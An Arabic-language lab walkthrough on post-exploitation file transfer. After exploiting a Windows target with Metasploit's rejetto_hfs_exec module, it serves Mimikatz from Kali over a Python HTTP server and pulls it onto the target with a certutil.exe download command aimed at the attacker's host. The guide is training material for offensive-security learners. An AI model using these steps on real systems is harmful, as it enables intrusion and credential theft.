🧪 2. نقل الملفات إلى أهداف Windows ( Transferring Files To Windows Targets)

🎯 الهدف الأساسي: بعد الحصول على جلسة Meterpreter على نظام Windows مستهدف، نقل ملفات الأدوات (مثل Mimikatz) من نظام Kali Linux (المهاجم) إلى النظام المستهدف باستخدام خادم HTTP وcertutil.exe.

🔧 الأدوات المستخدمة:

  • Nmap

  • Metasploit Framework (MSFConsole)

  • exploit/windows/http/rejetto_hfs_exec (Metasploit module)

  • Meterpreter commands: cd, pwd, mkdir, shell

  • Python 3 (http.server)

  • Windows Command Shell command: certutil.exe -urlcache -f http://[Kali IP]:[HTTP Port]/[Filename] [Destination Filename]

📜 خطوات التنفيذ:

📊 أولاً: الاستطلاع والفحص والاستغلال (Reconnaissance, Scanning & Exploitation) 🗣️ إذا كررت عملية الاستطلاع والفحص والاستغلال (Nmap، Metasploit، rejetto_hfs_exec) كما في اللابات السابقة.

  • فسوف تحصل على جلسة Meterpreter على النظام المستهدف.

  • للتحقق من صلاحياتك:

    getuid

    فسوف يعرض لك أنك داخل بصلاحيات Administrator.

📊 ثانياً: إعداد خادم HTTP على Kali (Post-Exploitation - File Transfer)

  • لو فتحت New Tab في Terminal الخاص بـ Kali.

  • لو توجهت إلى المجلد الذي يحتوي على الملفات التي تريد نقلها (مثلاً مجلد Mimikatz):

    cd /usr/share/windows-resources/mimikatz/x64/ # مثال
  • لو قمت بتشغيل خادم HTTP بسيط على المنفذ 80:

    python3 -m http.server 80

    فسوف يبدأ خادم HTTP في مشاركة ملفات المجلد.

📊 ثالثاً: نقل الملفات إلى Windows Target باستخدام certutil.exe (Post-Exploitation - File Transfer)

  • لو عدت إلى جلسة Meterpreter على النظام المستهدف.

  • لو أردت إنشاء مجلد مؤقت لتخزين الملف فيه (مثل C:\Temp):

    فسوف يتم إنشاء المجلد والانتقال إليه.

  • 🔑لو انتقلت إلى Command Shell:

    🔑لو كتبت الأمر التالي لتنزيل الملف (مثلاً mimikatz.exe) من خادم HTTP على Kali:

    • تأكد من صحة عنوان IP الخاص بـ Kali (مثال: 10.10.24.15).

    • فسوف يقوم الأمر certutil بتنزيل الملف وحفظه على النظام المستهدف في المجلد الحالي.

    • في Terminal الخاص بخادم HTTP على Kali، فسوف تلاحظ طلب GET الناجح.

نقاط التحقق:

  • الوصول إلى جلسة Meterpreter.

  • نجاح تشغيل خادم HTTP على Kali.

  • 🔑 نجاح تنزيل ملف mimikatz.exe على النظام المستهدف باستخدام certutil.exe.

  • رؤية طلب GET في سجلات خادم HTTP على Kali.

Last updated